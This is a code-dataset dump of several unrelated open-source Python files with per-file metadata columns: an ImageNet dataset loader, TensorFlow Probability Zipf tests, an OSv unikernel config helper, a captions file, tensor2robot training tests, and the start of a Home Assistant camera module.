content (stringlengths 7-928k) | avg_line_length (float64 3.5-33.8k) | max_line_length (int64 6-139k) | alphanum_fraction (float64 0.08-0.96) | licenses (sequence) | repository_name (stringlengths 7-104) | path (stringlengths 4-230) | size (int64 7-928k) | lang (stringclasses 1 value)
---|---|---|---|---|---|---|---|---
import os
import cv2
from PIL import Image
import torch
import mmcv
import numpy as np
from torch.utils.data import Dataset
import torchvision.transforms as T
from torchvision.datasets import ImageFolder
class ImageNetDataset(Dataset):
def __init__(self,
data_root,
test_mode=False,**kwargs):
self.classes = list(range(1000))
normalize = T.Normalize(mean=[0.456], std=[1.0])
#normalize = T.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225])
if not test_mode:
traindir = os.path.join(data_root, 'train')
self.dataset = ImageFolder(traindir, T.Compose([
T.Grayscale(num_output_channels=1),
T.RandomResizedCrop(224, scale=(0.8, 1.0)),
T.RandomHorizontalFlip(),
T.ToTensor(),
normalize,
]))
else:
valdir = os.path.join(data_root, 'val')
self.dataset = ImageFolder(valdir, T.Compose([
T.Resize(256),
T.CenterCrop(224),
T.ToTensor(),
normalize,
]))
if not test_mode:
self._set_group_flag()
def _set_group_flag(self):
"""Set flag according to image aspect ratio.
Images with aspect ratio greater than 1 will be set as group 1,
otherwise group 0.
"""
self.flag = np.zeros(len(self), dtype=np.uint8)
def __getitem__(self, idx):
d = dict(img=self.dataset[idx][0], label=torch.tensor([self.dataset[idx][1]], dtype=torch.long))
return d
def __len__(self):
return len(self.dataset)
| 32.254237 | 104 | 0.504467 | ["Apache-2.0"] | anorthman/mmdetection | mmdet/datasets/classify/imagenet.py | 1,903 | Python |
# Copyright 2018 The TensorFlow Probability Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
# Dependency imports
import numpy as np
from scipy import stats
import tensorflow as tf
import tensorflow_probability as tfp
from tensorflow_probability.python.internal import test_case
from tensorflow_probability.python.internal import test_util as tfp_test_util
from tensorflow.python.framework import test_util # pylint: disable=g-direct-tensorflow-import,g-import-not-at-top
tfd = tfp.distributions
@test_util.run_all_in_graph_and_eager_modes
class ZipfTest(test_case.TestCase):
def assertBetween(self, x, minimum, maximum):
self.assertGreaterEqual(x, minimum)
self.assertLessEqual(x, maximum)
def assertAllBetween(self, a, minval, maxval, atol=1e-6):
a = self._GetNdArray(a)
minval = self._GetNdArray(minval)
maxval = self._GetNdArray(maxval)
self.assertEqual(a.shape, minval.shape)
self.assertEqual(a.shape, maxval.shape)
for idx, _ in np.ndenumerate(a):
self.assertBetween(a[idx], minval[idx] - atol, maxval[idx] + atol)
def testZipfShape(self):
power = tf.constant([3.0] * 5)
zipf = tfd.Zipf(power=power)
self.assertEqual(self.evaluate(zipf.batch_shape_tensor()), (5,))
self.assertEqual(zipf.batch_shape, tf.TensorShape([5]))
self.assertAllEqual(self.evaluate(zipf.event_shape_tensor()), [])
self.assertEqual(zipf.event_shape, tf.TensorShape([]))
def testInvalidPower(self):
invalid_powers = [-.02, 0.5, -2., .99, 1.]
for power in invalid_powers:
with self.assertRaisesOpError("Condition x > y"):
zipf = tfd.Zipf(power=power, validate_args=True)
self.evaluate(zipf.power)
def testNanPower(self):
zipf = tfd.Zipf(power=np.nan, validate_args=False)
self.assertAllNan(self.evaluate(zipf.power))
def testValidPower_ImplicitlyConvertsToFloat32(self):
powers = [2, 10, 1.1]
for power in powers:
zipf = tfd.Zipf(power=power, validate_args=True)
self.assertEqual(zipf.power.dtype, tf.float32)
def testEventDtype(self):
for power_dtype in [tf.float32, tf.float64]:
for event_dtype in [tf.int32, tf.int64, tf.float32, tf.float64]:
power = tf.constant(5., dtype=power_dtype)
zipf = tfd.Zipf(power=power, dtype=event_dtype)
self.assertEqual(zipf.dtype, event_dtype)
self.assertEqual(zipf.dtype, zipf.sample(10).dtype)
self.assertEqual(zipf.dtype, zipf.sample(1).dtype)
self.assertEqual(zipf.dtype, zipf.mode().dtype)
def testInvalidEventDtype(self):
with self.assertRaisesWithPredicateMatch(
TypeError, "power.dtype .* not a supported .* type"):
power = tf.constant(5., dtype=tf.float16)
zipf = tfd.Zipf(power=power, dtype=tf.int32, validate_args=True)
self.evaluate(zipf.sample())
def testZipfLogPmf_InvalidArgs(self):
power = tf.constant([4.0])
    # Non-integer and non-positive samples are rejected if validate_args is
    # True and interpolate_nondiscrete is False.
non_integer_samples = [0.99, 4.5, 5.001, 1e-6, -3, -2, -1, -0., 0]
for x in non_integer_samples:
zipf = tfd.Zipf(
power=power, interpolate_nondiscrete=False, validate_args=True)
with self.assertRaisesOpError("Condition (x == y|x > 0)"):
self.evaluate(zipf.log_prob(x))
with self.assertRaisesOpError("Condition (x == y|x > 0)"):
self.evaluate(zipf.prob(x))
def testZipfLogPmf_IntegerArgs(self):
batch_size = 9
power = tf.constant([3.0] * batch_size)
power_v = 3.0
x = np.array([-3., -0., 0., 2., 3., 4., 5., 6., 7.], dtype=np.float32)
zipf = tfd.Zipf(power=power)
log_pmf = zipf.log_prob(x)
self.assertEqual((batch_size,), log_pmf.shape)
self.assertAllClose(self.evaluate(log_pmf), stats.zipf.logpmf(x, power_v))
pmf = zipf.prob(x)
self.assertEqual((batch_size,), pmf.shape)
self.assertAllClose(self.evaluate(pmf), stats.zipf.pmf(x, power_v))
def testZipfLogPmf_NonIntegerArgs(self):
batch_size = 12
power = tf.constant([3.0] * batch_size)
power_v = 3.0
x = [-3., -0.5, 0., 2., 2.2, 3., 3.1, 4., 5., 5.5, 6., 7.2]
zipf = tfd.Zipf(power=power)
log_pmf = zipf.log_prob(x)
self.assertEqual((batch_size,), log_pmf.shape)
# Check that log_pmf(x) of tfd.Zipf is between the values of
# stats.zipf.logpmf for ceil(x) and floor(x).
log_pmf_values = self.evaluate(log_pmf)
floor_x = np.floor(x)
ceil_x = np.ceil(x)
self.assertAllBetween(log_pmf_values, stats.zipf.logpmf(ceil_x, power_v),
stats.zipf.logpmf(floor_x, power_v))
# Check that pmf(x) of tfd.Zipf is between the values of stats.zipf.pmf for
# ceil(x) and floor(x).
pmf = zipf.prob(x)
self.assertEqual((batch_size,), pmf.shape)
pmf_values = self.evaluate(pmf)
self.assertAllBetween(pmf_values, stats.zipf.pmf(ceil_x, power_v),
stats.zipf.pmf(floor_x, power_v))
def testZipfLogPmf_NonIntegerArgsNoInterpolation(self):
batch_size = 12
power = tf.constant([3.0] * batch_size)
power_v = 3.0
x = [-3., -0.5, 0., 2., 2.2, 3., 3.1, 4., 5., 5.5, 6., 7.2]
zipf = tfd.Zipf(power=power, interpolate_nondiscrete=False)
log_pmf = zipf.log_prob(x)
self.assertEqual((batch_size,), log_pmf.shape)
log_pmf_values = self.evaluate(log_pmf)
self.assertAllClose(log_pmf_values, stats.zipf.logpmf(x, power_v))
pmf = zipf.prob(x)
self.assertEqual((batch_size,), pmf.shape)
pmf_values = self.evaluate(pmf)
self.assertAllClose(pmf_values, stats.zipf.pmf(x, power_v))
def testZipfLogPmfMultidimensional_IntegerArgs(self):
batch_size = 6
power = tf.constant([[2.0, 4.0, 5.0]] * batch_size)
power_v = [2.0, 4.0, 5.0]
x = np.array([[2.1, 3.5, 4.9, 5., 6.6, 7.]], dtype=np.int32).T
zipf = tfd.Zipf(power=power)
log_pmf = zipf.log_prob(x)
self.assertEqual((6, 3), log_pmf.shape)
self.assertAllClose(self.evaluate(log_pmf), stats.zipf.logpmf(x, power_v))
pmf = zipf.prob(x)
self.assertEqual((6, 3), pmf.shape)
self.assertAllClose(self.evaluate(pmf), stats.zipf.pmf(x, power_v))
def testZipfLogPmfMultidimensional_NonIntegerArgs(self):
batch_size = 6
power = tf.constant([[2.0, 4.0, 5.0]] * batch_size)
power_v = [2.0, 4.0, 5.0]
x = np.array([[2., 3.2, 4.3, 5.5, 6.9, 7.]], dtype=np.float32).T
floor_x = np.floor(x)
ceil_x = np.ceil(x)
zipf = tfd.Zipf(power=power)
log_pmf = zipf.log_prob(x)
self.assertEqual((6, 3), log_pmf.shape)
self.assertAllBetween(
self.evaluate(log_pmf), stats.zipf.logpmf(ceil_x, power_v),
stats.zipf.logpmf(floor_x, power_v))
pmf = zipf.prob(x)
self.assertEqual((6, 3), pmf.shape)
self.assertAllBetween(
self.evaluate(pmf), stats.zipf.pmf(ceil_x, power_v),
stats.zipf.pmf(floor_x, power_v))
def testZipfCdf_IntegerArgs(self):
batch_size = 12
power = tf.constant([3.0] * batch_size)
power_v = 3.0
x = [-3, -2, -1, 0, 1, 2, 3, 4, 5, 6, 7, 8]
zipf = tfd.Zipf(power=power)
log_cdf = zipf.log_cdf(x)
self.assertEqual((batch_size,), log_cdf.shape)
self.assertAllClose(self.evaluate(log_cdf), stats.zipf.logcdf(x, power_v))
cdf = zipf.cdf(x)
self.assertEqual((batch_size,), cdf.shape)
self.assertAllClose(self.evaluate(cdf), stats.zipf.cdf(x, power_v))
def testZipfCdf_NonIntegerArgsNoInterpolation(self):
batch_size = 12
power = tf.constant([3.0] * batch_size)
power_v = 3.0
x = [-3.5, -0.5, 0., 1, 1.1, 2.2, 3.1, 4., 5., 5.5, 6.4, 7.8]
zipf = tfd.Zipf(power=power, interpolate_nondiscrete=False)
log_cdf = zipf.log_cdf(x)
self.assertEqual((batch_size,), log_cdf.shape)
self.assertAllClose(self.evaluate(log_cdf), stats.zipf.logcdf(x, power_v))
cdf = zipf.cdf(x)
self.assertEqual((batch_size,), cdf.shape)
self.assertAllClose(self.evaluate(cdf), stats.zipf.cdf(x, power_v))
def testZipfCdf_NonIntegerArgsInterpolated(self):
batch_size = 12
power = tf.constant([3.0] * batch_size)
power_v = 3.0
x = [-3.5, -0.5, 0., 1, 1.1, 2.2, 3.1, 4., 5., 5.5, 6.4, 7.8]
floor_x = np.floor(x)
ceil_x = np.ceil(x)
zipf = tfd.Zipf(power=power)
log_cdf = zipf.log_cdf(x)
self.assertEqual((batch_size,), log_cdf.shape)
self.assertAllBetween(
self.evaluate(log_cdf), stats.zipf.logcdf(floor_x, power_v),
stats.zipf.logcdf(ceil_x, power_v))
cdf = zipf.cdf(x)
self.assertEqual((batch_size,), cdf.shape)
self.assertAllBetween(
self.evaluate(cdf), stats.zipf.cdf(floor_x, power_v),
stats.zipf.cdf(ceil_x, power_v))
def testZipfCdf_NonIntegerArgs(self):
batch_size = 12
power = tf.constant([3.0] * batch_size)
power_v = 3.0
x = [-3.5, -0.5, 0., 1, 1.1, 2.2, 3.1, 4., 5., 5.5, 6.4, 7.8]
floor_x = np.floor(x)
ceil_x = np.ceil(x)
zipf = tfd.Zipf(power=power)
log_cdf = zipf.log_cdf(x)
self.assertEqual((batch_size,), log_cdf.shape)
self.assertAllBetween(
self.evaluate(log_cdf), stats.zipf.logcdf(floor_x, power_v),
stats.zipf.logcdf(ceil_x, power_v))
cdf = zipf.cdf(x)
self.assertEqual((batch_size,), cdf.shape)
self.assertAllBetween(
self.evaluate(cdf), stats.zipf.cdf(floor_x, power_v),
stats.zipf.cdf(ceil_x, power_v))
def testZipfCdfMultidimensional_IntegerArgs(self):
batch_size = 6
power = tf.constant([[2.0, 4.0, 5.0]] * batch_size)
power_v = [2.0, 4.0, 5.0]
x = np.array([[2., 3., 4., 5., 6., 7.]], dtype=np.float32).T
zipf = tfd.Zipf(power=power)
log_cdf = zipf.log_cdf(x)
self.assertEqual((6, 3), log_cdf.shape)
self.assertAllClose(self.evaluate(log_cdf), stats.zipf.logcdf(x, power_v))
cdf = zipf.cdf(x)
self.assertEqual((6, 3), cdf.shape)
self.assertAllClose(self.evaluate(cdf), stats.zipf.cdf(x, power_v))
def testZipfCdfMultidimensional_NonIntegerArgs(self):
batch_size = 6
power = tf.constant([[2.0, 4.0, 5.0]] * batch_size)
power_v = [2.0, 4.0, 5.0]
x = np.array([[2.3, 3.5, 4.1, 5.5, 6.8, 7.9]], dtype=np.float32).T
floor_x = np.floor(x)
ceil_x = np.ceil(x)
zipf = tfd.Zipf(power=power)
log_cdf = zipf.log_cdf(x)
self.assertEqual((6, 3), log_cdf.shape)
self.assertAllBetween(
self.evaluate(log_cdf), stats.zipf.logcdf(floor_x, power_v),
stats.zipf.logcdf(ceil_x, power_v))
cdf = zipf.cdf(x)
self.assertEqual((6, 3), cdf.shape)
self.assertAllBetween(
self.evaluate(cdf), stats.zipf.cdf(floor_x, power_v),
stats.zipf.cdf(ceil_x, power_v))
def testZipfMean(self):
power_v = [2.0, 3.0, 2.5]
zipf = tfd.Zipf(power=power_v)
self.assertEqual((3,), zipf.mean().shape)
self.assertAllClose(self.evaluate(zipf.mean()), stats.zipf.mean(power_v))
def testZipfVariance(self):
power_v = [4.0, 3.0, 5.5] # var is undefined for power <= 3
zipf = tfd.Zipf(power=power_v)
self.assertEqual((3,), zipf.variance().shape)
stat_vars = np.vectorize(stats.zipf.var)(power_v)
self.assertAllClose(self.evaluate(zipf.variance()), stat_vars)
def testZipfStd(self):
power_v = [4.0, 3.5, 4.5]
zipf = tfd.Zipf(power=power_v)
self.assertEqual((3,), zipf.stddev().shape)
stat_stddevs = np.vectorize(stats.zipf.std)(power_v)
self.assertAllClose(self.evaluate(zipf.stddev()), stat_stddevs)
def testZipfMode(self):
power_v = [10.0, 3.0, 2.5, 3.2, 1.1, 0.05]
zipf = tfd.Zipf(power=power_v)
self.assertEqual((6,), zipf.mode().shape)
self.assertAllClose(self.evaluate(zipf.mode()), np.ones_like(power_v))
def testZipfSample(self):
power_v = 5.
n = int(500e4)
for power_dtype in [tf.float32, tf.float64]:
power = tf.constant(power_v, dtype=power_dtype)
for dtype in [tf.int32, tf.int64, tf.float32, tf.float64]:
zipf = tfd.Zipf(power=power, dtype=dtype)
samples = zipf.sample(n, seed=tfp_test_util.test_seed())
sample_values = self.evaluate(samples)
self.assertEqual((n,), samples.shape)
self.assertEqual((n,), sample_values.shape)
self.assertAllClose(
sample_values.mean(), stats.zipf.mean(power_v), rtol=.01)
self.assertAllClose(
sample_values.std(), stats.zipf.std(power_v), rtol=.03)
def testZipfSample_ValidateArgs(self):
power_v = 3.
n = int(100e3)
for power_dtype in [tf.float32, tf.float64]:
power = tf.constant(power_v, dtype=power_dtype)
for dtype in [tf.int32, tf.int64, tf.float32, tf.float64]:
zipf = tfd.Zipf(power=power, dtype=dtype, validate_args=True)
samples = zipf.sample(n, seed=tfp_test_util.test_seed())
self.evaluate(samples)
def testZipfSampleMultidimensionalMean(self):
power_v = np.array([np.arange(5, 15, dtype=np.float32)]) # 1 x 10
zipf = tfd.Zipf(power=power_v)
n = int(100e3)
samples = zipf.sample(n, seed=tfp_test_util.test_seed())
sample_values = self.evaluate(samples)
self.assertEqual((n, 1, 10,), samples.shape)
self.assertEqual((n, 1, 10,), sample_values.shape)
# stats.zipf wants float64 params.
stats_mean = np.vectorize(stats.zipf.mean)(power_v.astype(np.float64))
self.assertAllClose(sample_values.mean(axis=0), stats_mean, rtol=.01)
def testZipfSampleMultidimensionalStd(self):
power_v = np.array([np.arange(5, 10, dtype=np.float32)]) # 1 x 5
zipf = tfd.Zipf(power=power_v)
n = int(100e4)
samples = zipf.sample(n, seed=tfp_test_util.test_seed())
sample_values = self.evaluate(samples)
self.assertEqual((n, 1, 5), samples.shape)
self.assertEqual((n, 1, 5), sample_values.shape)
# stats.zipf wants float64 params.
stats_std = np.vectorize(stats.zipf.std)(power_v.astype(np.float64))
self.assertAllClose(sample_values.std(axis=0), stats_std, rtol=.04)
# Test that sampling with the same seed twice gives the same results.
def testZipfSampleMultipleTimes(self):
n = 1000
seed = tfp_test_util.test_seed()
power = 1.5
zipf1 = tfd.Zipf(power=power, name="zipf1")
tf.compat.v1.set_random_seed(seed)
samples1 = self.evaluate(zipf1.sample(n, seed=seed))
zipf2 = tfd.Zipf(power=power, name="zipf2")
tf.compat.v1.set_random_seed(seed)
samples2 = self.evaluate(zipf2.sample(n, seed=seed))
self.assertAllEqual(samples1, samples2)
def testZipfSample_AvoidsInfiniteLoop(self):
zipf = tfd.Zipf(power=1.)
n = 1000
self.evaluate(zipf.sample(n, seed=tfp_test_util.test_seed()))
if __name__ == "__main__":
tf.test.main()
| 36.584726 | 115 | 0.666058 | ["Apache-2.0"] | ColCarroll/probability | tensorflow_probability/python/distributions/zipf_test.py | 15,329 | Python |
"""Implements interface for OSv unikernels."""
from backend.vm import VMConfig
from os import path
from .imgedit import set_cmdline
class OSv:
cmdline_template = "--ip=eth0,{ipv4_addr},255.255.255.0 --nameserver=10.0.125.0 {extra_cmdline}"
@staticmethod
def configure(image, config, nic_name):
cmdline = OSv.cmdline_template.format(
ipv4_addr=config.ipv4_addr,
extra_cmdline=config.cmdline if config.cmdline else image.default_cmdline,
)
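        # Write the generated boot command line into the OSv disk image
        # before building the VM configuration.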
set_cmdline(path.join(image.root, 'system.qemu'), cmdline)
vmc = VMConfig(
name=config.name,
nic_name=nic_name,
num_cpus=4,
vdisk_path=path.join(image.root, 'system.qemu'),
vdisk_format='qcow2',
memory_size=1024000
)
return vmc
| 29.535714 | 100 | 0.634825 | ["MIT"] | Cunik/Cunik-engine | backend/unikernel/osv/__init__.py | 827 | Python |
#
# Captions:
#
project_title="Services Repository"
project_owner1=""
project_owner2=""
project_cip="ServiceRepo"
nav_up="To the top"
cap_findsrv="Find service"
cap_findsrv_desc="Find service by JSON key"
cap_findsrvtag_desc="...or by query variable, tag etc."
cap_injson="Incoming JSON"
cap_outjson="Outgoing JSON"
cap_search_and="AND"
cap_search_or="OR"
cap_showall_conf="Show all saved services?"
#
b_find="Find service"
b_findall="Show all"
#
err_emptyq="Empty search query"
| 16.758621 | 55 | 0.771605 | ["MIT"] | divlv/servicerepo | www/captions.py | 486 | Python |
# coding=utf-8
# Copyright 2019 The Tensor2Robot Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Lint as: python2, python3
"""Tests for tensor2robot.train_eval."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import functools
import os
from absl import flags
import gin
import mock
import numpy as np
from six.moves import zip
from tensor2robot.hooks import hook_builder
from tensor2robot.models import abstract_model
from tensor2robot.preprocessors import noop_preprocessor
from tensor2robot.utils import mocks
from tensor2robot.utils import train_eval
import tensorflow.compat.v1 as tf
from tensorflow.contrib import predictor as contrib_predictor
FLAGS = flags.FLAGS
_MAX_TRAIN_STEPS = 400
_EVAL_STEPS = 40
_BATCH_SIZE = 4
_EVAL_THROTTLE_SECS = 0.0
class FakeHook(tf.train.SessionRunHook):
def __init__(self):
self._mock = mock.MagicMock()
def begin(self):
self._mock.begin()
return
@property
def mock(self):
return self._mock
class FakeHookBuilder(hook_builder.HookBuilder):
def __init__(self):
self._hook = FakeHook()
def create_hooks(self, *args, **kwargs):
del args, kwargs
return [self._hook]
@property
def hook_mock(self):
return self._hook.mock
class TrainEvalTest(tf.test.TestCase):
def _compute_total_loss(self, labels, logits):
"""Summation of the categorical hinge loss for labels and logits."""
error = 0.
for label, logit in zip(labels, logits):
# Reference tensorflow implementation can be found in keras.losses.
positive = (label * logit)
negative = ((1 - label) * logit)
error += np.maximum(0., negative - positive + 1.)
return error
def test_train_eval_model(self):
"""Tests that a simple model trains and exported models are valid."""
gin.bind_parameter('tf.estimator.RunConfig.save_checkpoints_steps', 100)
model_dir = self.create_tempdir().full_path
mock_t2r_model = mocks.MockT2RModel(
preprocessor_cls=noop_preprocessor.NoOpPreprocessor)
mock_input_generator_train = mocks.MockInputGenerator(
batch_size=_BATCH_SIZE)
mock_input_generator_eval = mocks.MockInputGenerator(batch_size=1)
fake_hook_builder = FakeHookBuilder()
train_eval.train_eval_model(
t2r_model=mock_t2r_model,
input_generator_train=mock_input_generator_train,
input_generator_eval=mock_input_generator_eval,
max_train_steps=_MAX_TRAIN_STEPS,
model_dir=model_dir,
train_hook_builders=[fake_hook_builder],
eval_hook_builders=[fake_hook_builder],
eval_steps=_EVAL_STEPS,
eval_throttle_secs=_EVAL_THROTTLE_SECS,
create_exporters_fn=train_eval.create_default_exporters)
self.assertTrue(fake_hook_builder.hook_mock.begin.called)
# We ensure that both numpy and tf_example inference models are exported.
best_exporter_numpy_path = os.path.join(model_dir, 'export',
'best_exporter_numpy', '*')
numpy_model_paths = sorted(tf.io.gfile.glob(best_exporter_numpy_path))
# There should be at least 1 exported model.
self.assertGreater(len(numpy_model_paths), 0)
# This mock network converges nicely which is why we have several best
# models, by default we keep the best 5 and the latest one is always the
# best.
self.assertLessEqual(len(numpy_model_paths), 5)
best_exporter_tf_example_path = os.path.join(
model_dir, 'export', 'best_exporter_tf_example', '*')
tf_example_model_paths = sorted(
tf.io.gfile.glob(best_exporter_tf_example_path))
# There should be at least 1 exported model.
self.assertGreater(len(tf_example_model_paths), 0)
# This mock network converges nicely which is why we have several best
# models, by default we keep the best 5 and the latest one is always the
# best.
self.assertLessEqual(len(tf_example_model_paths), 5)
# We test both saved models within one test since the bulk of the time
    # is spent training the model in the first place.
# Verify that the serving estimator does exactly the same as the normal
# estimator with all the parameters.
estimator_predict = tf.estimator.Estimator(
model_fn=mock_t2r_model.model_fn,
config=tf.estimator.RunConfig(model_dir=model_dir))
prediction_ref = estimator_predict.predict(
input_fn=mock_input_generator_eval.create_dataset_input_fn(
mode=tf.estimator.ModeKeys.EVAL))
# Now we can load our exported estimator graph with the numpy feed_dict
# interface, there are no dependencies on the model_fn or preprocessor
# anymore.
# We load the latest model since it had the best eval performance.
numpy_predictor_fn = contrib_predictor.from_saved_model(
numpy_model_paths[-1])
features, labels = mock_input_generator_eval.create_numpy_data()
ref_error = self._compute_total_loss(
labels, [val['logit'].flatten() for val in prediction_ref])
numpy_predictions = []
for feature, label in zip(features, labels):
predicted = numpy_predictor_fn({'x': feature.reshape(
1, -1)})['logit'].flatten()
numpy_predictions.append(predicted)
# This ensures that we actually achieve near-perfect classification.
if label > 0:
self.assertGreater(predicted[0], 0)
else:
self.assertLess(predicted[0], 0)
numpy_error = self._compute_total_loss(labels, numpy_predictions)
# Now we can load our exported estimator graph with the tf_example feed_dict
# interface, there are no dependencies on the model_fn or preprocessor
# anymore.
# We load the latest model since it had the best eval performance.
tf_example_predictor_fn = contrib_predictor.from_saved_model(
tf_example_model_paths[-1])
tf_example_predictions = []
for feature, label in zip(features, labels):
# We have to create our serialized tf.Example proto.
example = tf.train.Example()
example.features.feature['measured_position'].float_list.value.extend(
feature)
feed_dict = {
'input_example_tensor':
np.array(example.SerializeToString()).reshape(1,)
}
predicted = tf_example_predictor_fn(feed_dict)['logit'].flatten()
tf_example_predictions.append(predicted)
# This ensures that we actually achieve perfect classification.
if label > 0:
self.assertGreater(predicted[0], 0)
else:
self.assertLess(predicted[0], 0)
tf_example_error = self._compute_total_loss(labels, tf_example_predictions)
np.testing.assert_almost_equal(tf_example_error, numpy_error)
    # The exported saved models both have to have the same performance, and
    # since we train and eval on the same fixed dataset, the latest and
    # greatest model error should also be the best.
np.testing.assert_almost_equal(ref_error, tf_example_error, decimal=3)
def test_init_from_checkpoint_global_step(self):
"""Tests that a simple model trains and exported models are valid."""
gin.bind_parameter('tf.estimator.RunConfig.save_checkpoints_steps', 100)
gin.bind_parameter('tf.estimator.RunConfig.keep_checkpoint_max', 3)
model_dir = self.create_tempdir().full_path
mock_t2r_model = mocks.MockT2RModel(
preprocessor_cls=noop_preprocessor.NoOpPreprocessor)
mock_input_generator_train = mocks.MockInputGenerator(
batch_size=_BATCH_SIZE)
train_eval.train_eval_model(
t2r_model=mock_t2r_model,
input_generator_train=mock_input_generator_train,
max_train_steps=_MAX_TRAIN_STEPS,
model_dir=model_dir,
eval_steps=_EVAL_STEPS,
eval_throttle_secs=_EVAL_THROTTLE_SECS,
create_exporters_fn=train_eval.create_default_exporters)
    # The model trains for _MAX_TRAIN_STEPS steps, saves a checkpoint every
    # 100 steps, and keeps at most 3 checkpoints -> len == 3.
self.assertLen(tf.io.gfile.glob(os.path.join(model_dir, 'model*.meta')), 3)
# The continuous training has its own directory.
continue_model_dir = self.create_tempdir().full_path
init_from_checkpoint_fn = functools.partial(
abstract_model.default_init_from_checkpoint_fn, checkpoint=model_dir)
continue_mock_t2r_model = mocks.MockT2RModel(
preprocessor_cls=noop_preprocessor.NoOpPreprocessor,
init_from_checkpoint_fn=init_from_checkpoint_fn)
continue_mock_input_generator_train = mocks.MockInputGenerator(
batch_size=_BATCH_SIZE)
train_eval.train_eval_model(
t2r_model=continue_mock_t2r_model,
input_generator_train=continue_mock_input_generator_train,
model_dir=continue_model_dir,
max_train_steps=_MAX_TRAIN_STEPS + 100,
eval_steps=_EVAL_STEPS,
eval_throttle_secs=_EVAL_THROTTLE_SECS,
create_exporters_fn=train_eval.create_default_exporters)
    # If the model was successfully restored, including the global step, only
    # one checkpoint in addition to the initial one should be created -> len == 2.
self.assertLen(
tf.io.gfile.glob(os.path.join(continue_model_dir, 'model*.meta')), 2)
def test_init_from_checkpoint_use_avg_model_params_and_weights(self):
"""Tests that a simple model trains and exported models are valid."""
gin.bind_parameter('tf.estimator.RunConfig.save_checkpoints_steps', 100)
gin.bind_parameter('tf.estimator.RunConfig.keep_checkpoint_max', 3)
model_dir = self.create_tempdir().full_path
mock_t2r_model = mocks.MockT2RModel(
preprocessor_cls=noop_preprocessor.NoOpPreprocessor,
use_avg_model_params=True)
mock_input_generator_train = mocks.MockInputGenerator(
batch_size=_BATCH_SIZE)
mock_input_generator = mocks.MockInputGenerator(batch_size=1)
mock_input_generator.set_specification_from_model(
mock_t2r_model, tf.estimator.ModeKeys.TRAIN)
train_eval.train_eval_model(
t2r_model=mock_t2r_model,
input_generator_train=mock_input_generator_train,
max_train_steps=_MAX_TRAIN_STEPS,
model_dir=model_dir)
init_checkpoint = tf.train.NewCheckpointReader(
tf.train.latest_checkpoint(model_dir))
# Verify that the serving estimator does exactly the same as the normal
# estimator with all the parameters.
initial_estimator_predict = tf.estimator.Estimator(
model_fn=mock_t2r_model.model_fn,
config=tf.estimator.RunConfig(model_dir=model_dir))
# pylint: disable=g-complex-comprehension
initial_predictions = [
prediction['logit'] for prediction in list(
initial_estimator_predict.predict(
input_fn=mock_input_generator.create_dataset_input_fn(
mode=tf.estimator.ModeKeys.EVAL)))
]
# The continuous training has its own directory.
continue_model_dir = self.create_tempdir().full_path
init_from_checkpoint_fn = functools.partial(
abstract_model.default_init_from_checkpoint_fn, checkpoint=model_dir)
continue_mock_t2r_model = mocks.MockT2RModel(
preprocessor_cls=noop_preprocessor.NoOpPreprocessor,
init_from_checkpoint_fn=init_from_checkpoint_fn)
continue_mock_input_generator_train = mocks.MockInputGenerator(
batch_size=_BATCH_SIZE)
# Re-initialize the model and train for one step, basically the same
# performance as the original model.
train_eval.train_eval_model(
t2r_model=continue_mock_t2r_model,
input_generator_train=continue_mock_input_generator_train,
model_dir=continue_model_dir,
max_train_steps=_MAX_TRAIN_STEPS)
continue_checkpoint = tf.train.NewCheckpointReader(
tf.train.latest_checkpoint(continue_model_dir))
for tensor_name, _ in tf.train.list_variables(model_dir):
if 'ExponentialMovingAverage' in tensor_name:
# These values are replaced by the swapping saver when using the
# use_avg_model_params.
continue
if 'Adam' in tensor_name:
# The adam optimizer values are not required.
continue
if 'global_step' in tensor_name:
# The global step will be incremented by 1.
continue
self.assertAllClose(
init_checkpoint.get_tensor(tensor_name),
continue_checkpoint.get_tensor(tensor_name),
atol=1e-3)
# Verify that the serving estimator does exactly the same as the normal
# estimator with all the parameters.
continue_estimator_predict = tf.estimator.Estimator(
model_fn=mock_t2r_model.model_fn,
config=tf.estimator.RunConfig(model_dir=continue_model_dir))
continue_predictions = [
prediction['logit'] for prediction in list(
continue_estimator_predict.predict(
input_fn=mock_input_generator.create_dataset_input_fn(
mode=tf.estimator.ModeKeys.EVAL)))
]
self.assertTrue(
np.allclose(initial_predictions, continue_predictions, atol=1e-1))
# A randomly initialized model estimator with all the parameters.
random_estimator_predict = tf.estimator.Estimator(
model_fn=mock_t2r_model.model_fn)
random_predictions = [
prediction['logit'] for prediction in list(
random_estimator_predict.predict(
input_fn=mock_input_generator.create_dataset_input_fn(
mode=tf.estimator.ModeKeys.EVAL)))
]
self.assertFalse(
np.allclose(initial_predictions, random_predictions, atol=1e-2))
if __name__ == '__main__':
tf.test.main()
| 39.611268 | 80 | 0.732399 | ["Apache-2.0"] | AakashOfficial/tensor2robot | utils/train_eval_test.py | 14,062 | Python |
"""Support for Agent camera streaming."""
from datetime import timedelta
import logging
from agent import AgentError
from homeassistant.components.camera import SUPPORT_ON_OFF
from homeassistant.components.mjpeg.camera import (
CONF_MJPEG_URL,
CONF_STILL_IMAGE_URL,
MjpegCamera,
filter_urllib3_logging,
)
from homeassistant.const import ATTR_ATTRIBUTION, CONF_NAME
from homeassistant.helpers import entity_platform
from .const import (
ATTRIBUTION,
CAMERA_SCAN_INTERVAL_SECS,
CONNECTION,
DOMAIN as AGENT_DOMAIN,
)
SCAN_INTERVAL = timedelta(seconds=CAMERA_SCAN_INTERVAL_SECS)
_LOGGER = logging.getLogger(__name__)
_DEV_EN_ALT = "enable_alerts"
_DEV_DS_ALT = "disable_alerts"
_DEV_EN_REC = "start_recording"
